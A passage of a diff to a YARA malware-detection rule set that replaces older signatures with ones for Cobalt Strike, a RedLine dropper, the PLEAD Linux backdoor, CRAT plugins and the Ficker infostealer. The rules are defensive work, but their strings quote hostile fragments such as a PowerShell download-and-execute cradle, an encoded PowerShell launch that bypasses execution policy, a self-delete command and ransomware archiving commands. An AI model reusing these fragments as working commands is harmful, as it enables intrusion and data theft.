filename=\"%s\"" fullword ascii + $s7 = "hello%s" fullword ascii + $s8 = "additional header failed..." fullword ascii + $s9 = "Set Option failed errcode: %ld" fullword ascii + $s10 = "add cookie failed..." fullword ascii + $u1 = "Mozilla/4.0 (compatible; )" fullword ascii + $u2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii condition: - all of ($cnc*) or all of ($s*) + uint16(0)==0x5a4d and ((1 of ($u*) and 4 of ($s*)) or ( all of ($u*) and 3 of ($s*)) or (5 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Spyeye : FILE +rule DITEKSHEN_MALWARE_Win_Cobaltstrike : FILE { meta: - description = "Detects SpyEye" + description = "CobaltStrike payload" author = "ditekSHen" - id = "aa15220a-6fd4-5c5e-8287-957fc3c3fe52" - date = "2024-09-06" - modified = "2024-09-06" + id = "140e16d0-0102-5650-a371-c95013d7f021" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4096-L4111" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "352853d600d1f4fbc09e58b783eb4e13b335fefbfe89842873710f0a9085d107" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1845-L1864" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "43513aef0ed715f0c214d7a14e465350f9c1bcadf87535e1c12561e976398bb3" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $x1 = "_CLEANSWEEP_" ascii wide - $x2 = "config.datUT" fullword ascii - $x3 = "webinjects.txtUT" fullword ascii - $s1 = "confirm:processCommand" fullword ascii - $s2 = "Smth wrong with navigate to REF-PAGE (err code: %d). 0_o" fullword ascii - $s3 = "(UTC%s%2.2f) %s" fullword wide - $s4 = "M\\F;u`r" fullword ascii - $s5 = "]YH0%Yn" fullword ascii + $s1 = "%%IMPORT%%" fullword ascii + $s2 = "www6.%x%x.%s" fullword ascii + $s3 = "cdn.%x%x.%s" fullword ascii + $s4 = "api.%x%x.%s" fullword ascii + $s5 = "%s (admin)" fullword ascii + $s6 = "could not spawn %s: %d" fullword ascii + $s7 = "Could not kill %d: %d" fullword ascii + $s8 = "Could not connect to pipe (%s): %d" fullword ascii + $s9 = /%s\.\d[(%08x).]+\.%x%x\.%s/ ascii + $pwsh1 = "IEX (New-Object Net.Webclient).DownloadString('http" ascii + $pwsh2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and 1 of ($s*))) + uint16(0)==0x5a4d and (5 of ($s*) or ( all of ($pwsh*) and 2 of ($s*)) or (#s9>6 and 4 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Renamer : FILE +rule DITEKSHEN_MALWARE_Win_Redlinedropperahk : FILE { meta: - description = "Detects Renamer/Tainp variants" + description = "Detects AutoIt/AutoHotKey executables dropping RedLine infostealer" author = "ditekSHen" - id = "9e701bbe-d698-510a-b63d-3c1575dac7b0" - date = "2024-09-06" - modified = "2024-09-06" + id = "16eee826-f1fd-5a6f-b6f3-e02ccd889614" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4114-L4135" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "df80657631f072bc1627e1cf503881a2c065396f8798d7f347259672f600198d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1866-L1878" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0950fe9daa02f3a8fd527f75275766111be7e8774578963b0bdb455800dfc4f9" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-AHK" strings: - $s1 = "shell\\open\\command=" fullword wide - $s2 = "icon=%SystemRoot%\\system32\\SHELL32.dll,4" fullword wide - $s3 = "DropTarget" ascii - $s4 = "C:\\Windows\\Paint" fullword wide - $s5 = "hold.inf" fullword wide - $s6 = "Dropped" ascii + $s1 = ".SetRequestHeader(\"User-Agent\",\" ( \" OSName \" | \" bit \" | \" CPUNAme \"\"" ascii + $s2 = ":= \" | Windows Defender\"" ascii + $s3 = "WindowSpy.ahk" wide + $s4 = ">AUTOHOTKEY SCRIPT<" fullword wide condition: - uint16(0)==0x5a4d and all of ($s*) or (4 of ($s*) and for any directory in pe.data_directories : (directory.virtual_address!=0 and directory.size==0)) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Epsilon : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent01 : FILE { meta: - description = "Detects Epsilon ransomware" + description = "Detects known downloader agent" author = "ditekSHen" - id = "c5561a0d-85ac-5137-a97e-310aa03eb787" - date = "2024-09-06" - modified = "2024-09-06" + id = "85ead6fd-b56e-5e78-8fb4-7c9ecb4c0b58" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4137-L4169" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cc4481ddb6f5fd52a0bc901dde4c34ccf79024cd68605245df0dcbea22d0adee" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1880-L1894" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7aec81655af9b779a314c3e2cff933aa6426fcfe21b5a87e60e159c7e7f5238a" score = 75 quality = 75 tags = "FILE" + snort_sid = "920007" + clamav_sig = "MALWARE.Win.Trojan.DLAgent01" strings: - $s1 = ".Speak \"" wide - $s2 = "chkUpdateRegistry" fullword wide - $s3 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide - $s4 = "CreateObject(\"sapi.spvoice\")" fullword wide - $s5 = "READ_ME.hta" wide - $s6 = "WScript.Sleep(" wide - $s7 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide - $s8 = "<div class='bold'>Files are encrypted* but not deleted.</div>" ascii - $e1 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 2e 00 65 00 - 78 00 65 00 00 09 2e 00 74 00 78 00 74 00 00 09 - 2e 00 64 00 6f 00 63 00 00 0b 2e 00 64 00 6f 00 - 63 00 78 00 00 09 2e 00 78 00 6c 00 73 00 00 0d - 2e 00 69 00 6e 00 64 00 65 00 78 00 00 09 2e 00 - 70 00 64 00 66 00 00 09 2e 00 7a 00 69 00 70 00 - 00 09 2e 00 72 00 61 00 72 00 00 09 2e 00 63 00 - 73 00 73 00 00 09 2e 00 6c 00 6e 00 6b 00 00 0b - 2e 00 78 00 6c 00 73 00 78 00 00 09 2e 00 70 00 - 70 00 74 00 00 0b 2e 00 70 00 70 00 74 00 78 00 - 00 09 2e 00 6f 00 64 00 } - $e2 = { 68 00 74 00 6d 00 00 07 2e 00 6d 00 6c 00 00 07 - 43 00 3a 00 5c 00 00 07 44 00 3a 00 5c 00 00 07 - 45 00 3a 00 5c 00 00 07 46 00 3a 00 5c 00 00 07 - 47 00 3a 00 5c 00 00 07 5a 00 3a 00 5c 00 00 07 - 41 00 3a 00 5c 00 00 0f 63 00 6d 00 64 00 2e 00 - 65 00 78 00 65 } + $s1 = "Mozilla/5.0 Gecko/41.0 Firefox/41.0" fullword wide + $s2 = "/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List" fullword wide + $s3 = "GUID.log" fullword wide + $s4 = "NO AV" fullword wide + $s5 = "%d:%I64d:%I64d:%I64d" fullword wide condition: - uint16(0)==0x5a4d and (6 of ($s*) or ( all of ($e*) and 4 of ($s*))) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Corebot : FILE +rule DITEKSHEN_MALWARE_Linux_PLEAD : FILE { meta: - description = "Detects CoreBot" + description = "PLEAD Linux payload" author = "ditekSHen" - id = "f0351bdb-34ff-5b6d-bc4b-61fc491401ef" - date = "2024-09-06" - modified = "2024-09-06" + id = "07aa0561-d6d9-53b6-97ac-670cdf04335d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4171-L4226" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "518209458fc8912d47b0b99896178fda823c3174c37f21d5e9331349a69322d7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1896-L1920" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "539998248ded0eb8ea1702c527804f89cfd55412f17ec699bd0af801f4fba673" score = 75 - quality = 50 + quality = 75 tags = "FILE" - snort_sid = "920211-920212" + clamav_sig = "MALWARE.Linux.Trojan.PLEAD" strings: - $f1 = "core.cert_fp" fullword ascii - $f2 = "core.crash_handler" fullword ascii - $f3 = "core.delay" fullword ascii - $f4 = "core.guid" fullword ascii - $f5 = "core.inject" fullword ascii - $f6 = "core.installed_file" fullword ascii - $f7 = "core.plugins_dir" fullword ascii - $f8 = "core.plugins_key" fullword ascii - $f9 = "core.safe_mode" fullword ascii - $f10 = "core.server" fullword ascii - $f11 = "core.servers" fullword ascii - $f12 = "core.test_env" fullword ascii - $f13 = "core.vm_detect" fullword ascii - $f14 = "core.vm_detect_skip" fullword ascii - $s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" fullword wide - $s2 = "\\Microsoft\\Windows\\AppCache" wide - $s3 = "crash_flag" fullword wide - $s4 = "container.dat" fullword wide - $s5 = "INJECTED" fullword ascii - $s6 = "tmp.delete_file" fullword ascii - $x1 = "CoreBot v" wide - $x2 = "BotName" fullword ascii - $x3 = "RunBotKiller" fullword ascii - $x4 = "botv" fullword ascii - $x5 = "\\CoreBot\\CoreBot\\obj\\" ascii - $v1_1 = "newtask" fullword wide - $v1_2 = "drivers\\etc\\hosts" fullword wide - $v1_3 = "/C schtasks /create /tn \\" wide - $v1_4 = "/st 00:00 /du 9999:59 /sc once /ri 1 /f" wide - $v1_5 = "AntivirusInstalled" fullword ascii - $v1_6 = "payload" fullword ascii - $v1_7 = "DownloadFile" fullword ascii - $v1_8 = "RemoveFile" fullword ascii - $v1_9 = "AutoRunName" fullword ascii - $v1_10 = "EditHosts" fullword ascii - $v1_11 = /127\.0\.0\.1 (avast|mcafee|eset|avira|bitdefender|bullguard|safebrowse)\.com/ fullword wide - $cnc1 = "&os=" fullword wide - $cnc2 = "&pv=" fullword wide - $cnc3 = "&ip=" fullword wide - $cnc4 = "&cn=" fullword wide - $cnc5 = "&lr=" fullword wide - $cnc6 = "&ct=" fullword wide - $cnc7 = "&bv=" fullword wide - $cnc8 = "&op=" fullword wide - $cnc9 = "&td=" fullword wide - $cnc10 = "&uni=" fullword wide + $x1 = "CFileTransfer" ascii + $x2 = "CFileManager" ascii + $x3 = "CPortForward" ascii + $x4 = "CPortForwardManager" ascii + $x5 = "CRemoteShell" ascii + $x6 = "CSockClient" ascii + $s1 = "/proc/self/exe" fullword ascii + $s2 = "/bin/sh" fullword ascii + $s3 = "echo -e '" ascii + $s4 = "%s <DIR> %s" ascii + $s5 = "%s %lld %s" ascii + $s6 = "Files: %d Size: %lld" ascii + $s7 = "Dirs: %d" ascii + $s8 = "%s(%s)/" ascii + $s9 = "%s %s %s %s" ascii condition: - uint16(0)==0x5a4d and (5 of ($f*) or all of ($s*) or (3 of ($s*) and 2 of ($f*)) or 3 of ($x*) or 8 of ($v1*) or (4 of ($cnc*) and 4 of ($v1*)) or 12 of them ) + uint16(0)==0x457f and ( all of ($x*) or all of ($s*) or 12 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dllloader : FILE +rule DITEKSHEN_MALWARE_Win_CRAT : FILE { meta: - description = "Detects unknown DLL Loader" + description = "Detects CRAT main DLL" author = "ditekSHen" - id = "164967b8-d0f5-543d-82ac-bb2465b85c2a" - date = "2024-09-06" - modified = "2024-09-06" + id = "9757a8de-61ea-55c0-b64c-055798450985" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4228-L4239" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "aaf1ff0f93d1fe6cf189c9f30403c226e64146178150dff8dfd3a9e3ed84bcc2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1922-L1944" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5a9fef68e110a1564dd5956408abcc3736cfa6853e1ac5510a089cc68f6bdc35" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "LondLibruryA" fullword ascii - $s2 = "LdrLoadDll" fullword ascii - $s3 = "snxhk.dll" fullword ascii - $s4 = "DisableThreadLibraryCalls" fullword ascii + $s1 = "cmd /c \"dir %s /s >> %s\"" wide + $s2 = "Set-Cookie:\\b*{.+?}\\n" wide + $s3 = "Location: {[0-9]+}" wide + $s4 = "Content-Disposition: form-data; name=\"%s\"; filename=\"" ascii + $s6 = "%serror.log" wide + $v2x_1 = "?timestamp=%u" wide + $v2x_2 = "config.txt" wide + $v2x_3 = "entdll.dll" wide + $v2x_4 = "\\cmd.exe" wide + $v2x_5 = "[MyDocuments]" wide + $v2x_6 = "@SetWindowTextW FindFileExA" wide + $v2x_7 = "Microsoft\\Windows\\WinX\\Group1\\*.exe" wide + $v2s_1 = "Installed Anti Virus Programs" ascii + $v2s_2 = "Running Processes" ascii + $v2s_3 = "id=%u&content=" ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and ( all of ($s*) or 6 of ($v2x*) or all of ($v2s*) or (2 of ($v2s*) and 4 of ($v2x*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Farfli : FILE +rule DITEKSHEN_MALWARE_Win_Cratpluginkeylogger : FILE { meta: - description = "Detects Farfli backdoor" + description = "Detects CRAT keylogger plugin DLL" author = "ditekSHen" - id = "4c3c86f4-5493-5e8a-9618-b0c3d55e2b86" - date = "2024-09-06" - modified = "2024-09-06" + id = "a8682786-7704-56f0-a6df-b4e2ab4d7536" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4241-L4253" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cb1856b32c66d6d070b8ec2d9feea25d6d6748057ceaa342be2ddc589f9a89d6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1946-L1962" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "58ef1f7466fcc871be2e74aa447c76970fd90c9d9d345a896fb8e6335114d189" score = 75 - quality = 50 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.CRAT" strings: - $s1 = "%ProgramFiles%\\Google\\" fullword ascii - $s2 = "%s\\%d.bak" fullword ascii - $s3 = "%s Win7" fullword ascii - $s4 = "%s:%d:%s" fullword ascii - $s5 = "C:\\2.txt" fullword ascii + $ai1 = "VM detected!" fullword wide + $ai2 = "Sandbox detected!" fullword wide + $ai3 = "Debug detected!" fullword wide + $ai4 = "Analysis process detected!" fullword wide + $s1 = "Create KeyLogMutex %s failure %d" wide + $s2 = "Key Log Mutex already created! %s" wide + $s3 = /KeyLogThread\s(started|finished|terminated)!/ wide + $s4 = /KeyLog_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (( all of ($ai*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($ai*)) or 5 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Warezov : FILE +rule DITEKSHEN_MALWARE_Win_Cratpluginclipboardmonitor : FILE { meta: - description = "Detects Warezov worm/downloader" + description = "Detects CRAT Clipboad Monitor plugin DLL" author = "ditekSHen" - id = "8cb1dcb1-981d-5ff2-b0d9-aa18dfbfc795" - date = "2024-09-06" - modified = "2024-09-06" + id = "587487c7-f00b-5d4a-8b18-e46d6c6560e2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4255-L4269" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e65922902fd18175a3ce7b600d46535e92b92240fa3ca83dced6f9ce14f3e815" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1964-L1979" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c3e692a06388e143a8e1053e75a6eb6a82da5bdf26d38e3a0e339bc20d8312a1" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "ft\\Windows\\CurrentVersion\\Run" wide - $s2 = "DIR%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide - $s3 = "%WINDIR%\\sqhos32.wmf" wide - $s4 = "Accept: */*" fullword ascii - $s5 = "Range: bytes=" fullword ascii - $s6 = "module.exe" fullword ascii - $s7 = { 25 73 25 73 2e 25 73 ?? ?? 22 22 26 6c 79 79 56 00 00 00 00 25 73 25 30 34 64 25 30 32 64 25 30 32 64 00 } + $ai1 = "VM detected!" fullword wide + $ai2 = "Sandbox detected!" fullword wide + $ai3 = "Debug detected!" fullword wide + $ai4 = "Analysis process detected!" fullword wide + $s1 = "Clipboard Monitor Mutex [%s] already created!" wide + $s2 = "ClipboardMonitorThread started!" fullword wide + $s3 = /MonitorClipboardThread\s(finished|terminated)!/ wide + $s4 = /ClipboardMonitor_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (( all of ($ai*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($ai*)) or 5 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Arechclient2 : FILE +rule DITEKSHEN_MALWARE_Win_Cratpluginscreencapture : FILE { meta: - description = "Detects Arechclient2 RAT" + description = "Detects CRAT Screen Capture plugin DLL" author = "ditekSHen" - id = "c12858ea-5e06-5303-9df0-0f59ba83b5e5" - date = "2024-09-06" - modified = "2024-09-06" + id = "ef0b6b88-8b1b-5ab5-ad81-276eaff0411f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4271-L4303" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0d841f4d4664fb09801c51f7b65e897e4e698753ad67fc20e2b81d98c0b3d07d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1981-L2000" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7b4378ae883d01338fabe2eb50a5509b722c661e63afc287afa07b263a0ebc42" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "\\Google\\Chrome\\User Data\\copiedProf\"" wide - $s2 = "\",\"BotName\":\"" wide - $s3 = "\",\"BotOS\":\"" wide - $s4 = "\",\"URLData\":\"" wide - $s5 = "{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"" wide - $s6 = "{\"Type\":\"TestURLDump\",\"SessionID\":\"" wide - $s7 = "<ReceiveParticipantList>" ascii - $s8 = "<potocSkr>" ascii - $s9 = "fuck_sd" fullword ascii - $s10 = "HandleBotKiller" fullword ascii - $s11 = "RunBotKiller" fullword ascii - $s12 = "ConnectToServer" fullword ascii - $s13 = "KillBrowsers" fullword ascii - $s14 = "keybd_event" fullword ascii - $s15 = "FuckCodeImg" fullword ascii - $v1_1 = "grabber@" fullword ascii - $v1_2 = "<BrowserProfile>k__" ascii - $v1_3 = "<SystemHardwares>k__" ascii - $v1_4 = "<geoplugin_request>k__" ascii - $v1_5 = "<ScannedWallets>k__" ascii - $v1_6 = "<DicrFiles>k__" ascii - $v1_7 = "<MessageClientFiles>k__" ascii - $v1_8 = /<Scan(Browsers|Wallets|Screen|VPN)>k__BackingField/ fullword ascii - $v1_9 = "displayName[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}Local Extension Settingshost" wide - $v1_10 = "\\sitemanager.xml MB or SELECT * FROM Cookiesconfig" wide + $ai1 = "VM detected!" fullword wide + $ai2 = "Sandbox detected!" fullword wide + $ai3 = "Debug detected!" fullword wide + $ai4 = "Analysis process detected!" fullword wide + $s1 = "User is inactive!, give up capture" wide + $s2 = "Capturing screen..." wide + $s3 = "%s\\P%02d%lu.tmp" fullword wide + $s4 = "CloseHandle ScreenCaptureMutex failure! %d" fullword wide + $s5 = "ScreenCaptureMutex already created! %s" fullword wide + $s6 = "Create ScreenCaptureMutex %s failure %d" fullword wide + $s7 = /ScreenCaptureThread\s(finished|terminated)!/ wide + $s8 = /ScreenCapture_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii condition: - uint16(0)==0x5a4d and (6 of ($s*) or 7 of ($v1*) or (6 of ($v1*) and 1 of ($s*))) + uint16(0)==0x5a4d and (( all of ($ai*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($ai*)) or 6 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Killmbr : FILE +rule DITEKSHEN_MALWARE_Win_Cratpluginransomhansom : FILE { meta: - description = "Detects KillMBR" + description = "Detects CRAT Hansom Ransomware plugin DLL" author = "ditekSHen" - id = "b109865f-e268-5633-bb8e-f390dd050d99" - date = "2024-09-06" - modified = "2024-09-06" + id = "0bfc97df-545f-5453-afe0-5777dc1c95b4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4305-L4316" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1ed9206f90052df7e533be4612afa373e5e69fba8f5b5ae4df1c09a9d98958cf" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2002-L2020" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b22f6d22630f311241634513eb051df2b36af84a938c1ae1f5284e5a5d7d3077" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "\\\\.\\PhysicalDrive" ascii - $s2 = "/logger.php" ascii - $s3 = "Ooops! Your MBR was been rewritten" ascii - $s4 = "No, this ransomware dont encrypt your files, erases it" ascii + $cmd1 = "/f /im \"%s\"" wide + $cmd2 = "add HKLM\\%s /v %s /t REG_DWORD /d %d /F" wide + $cmd3 = "add HKCU\\%s /v %s /t REG_DWORD /d %d /F" wide + $cmd4 = "\"%s\" a -y -ep -k -r -s -ibck -df -m0 -hp%s -ri1:%d \"%s\" \"%s\"" wide + $s1 = "\\hansom.jpg" wide + $s2 = "HansomMain" fullword ascii wide + $s3 = "ExtractHansom" fullword ascii wide + $s4 = "Hansom2008" fullword ascii + $s5 = ".hansomkey" fullword wide + $s6 = ".hansom" fullword wide + $s7 = /Ransom_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii condition: - uint16(0)==0x5a4d and (2 of them and #s1>10) + uint16(0)==0x5a4d and ((2 of ($cmd*) and 2 of ($s*)) or (4 of ($s*) and 1 of ($cmd*)) or 6 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Lcpdot : FILE +rule DITEKSHEN_MALWARE_Win_Aliencrypter : FILE { meta: - description = "Detects LCPDot" + description = "Detects AlienCrypter injector/downloader/obfuscator" author = "ditekSHen" - id = "e4db3784-7fb0-58bd-997e-788f409445cd" - date = "2024-09-06" - modified = "2024-09-06" + id = "af9e785a-bdec-5d3e-9a50-56f7f1a0507e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4318-L4337" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b0f77f17976c38a69c2ff0d84002f2db29a4d25873309259519115b5f2b210ff" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2022-L2036" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "28a2a6e6d58fd6efbb5753a7be5b621a3eac546d45f9481b9dd2641cbe70b547" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide - $s2 = "Cookie: SESSID=%s" fullword ascii - $s3 = "Cookie=Enable" fullword ascii - $s4 = "Cookie=Enable&CookieV=%d&Cookie_Time=32" fullword ascii - $s5 = ".?AVTShellCodeRuner@@" fullword ascii - $s6 = ".?AVTHashEncDecoder@@" fullword ascii - $s7 = ".?AVTWebAddressList@@" fullword ascii - $s8 = "WinMain.dll" fullword ascii - $s9 = "HotPlugin" wide - $o0 = { 4c 89 6c 24 08 4c 89 34 24 44 8d 77 01 44 8d 6f } - $o1 = { 8b f0 e8 58 34 00 00 48 8b f8 48 85 c0 74 0c 48 } - $o2 = { c7 44 24 30 47 49 46 38 c7 44 24 34 39 61 27 00 } + $s1 = ".AlienRunPE." ascii wide + $s2 = "RunAsNewUser_RunDLL" fullword wide + $s3 = { 00 50 52 4f 43 45 53 53 5f 53 55 53 50 45 4e 44 5f 52 45 53 55 4d 45 00 64 6e 6c 69 62 2e 50 45 00 } + $s4 = { 2e 41 6c 69 65 6e 52 75 6e 50 45 00 50 52 4f 43 45 53 53 5f 54 45 52 4d 49 4e 41 54 45 00 } + $s5 = "@@@http" wide + $resp1 = "</p><p>@@@77,90," ascii wide + $resp2 = "</p><p>@@@HH,JA," ascii wide condition: - uint16(0)==0x5a4d and 6 of ($s*) or ( all of ($o*) and 3 of ($s*)) + ( uint16(0)==0x5a4d and 3 of them ) or (1 of ($resp*) and 2 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Torisma : FILE +rule DITEKSHEN_MALWARE_Win_Ficker : FILE { meta: - description = "Detects Torisma" + description = "Detects Ficker infostealer" author = "ditekSHen" - id = "e62a0f1c-4404-5da1-9c43-4cb58e735827" - date = "2024-09-06" - modified = "2024-09-06" + id = "1cfeea86-e8bf-50fb-ba08-435d7a14a913" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4339-L4355" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bd3823f8a91fdfc443e20bcb299a5103b7176a694f0d5328e7986de83f677a31" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2038-L2055" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "adcc0ffc0e1ded36dc41c22d10d2ea293d5740484203892bcecf89a5f4001452" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.Ficker" strings: - $s1 = "ACTION=PREVPAGE&CODE=C%s&RES=%d" fullword ascii - $s2 = "ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d" fullword ascii - $s3 = 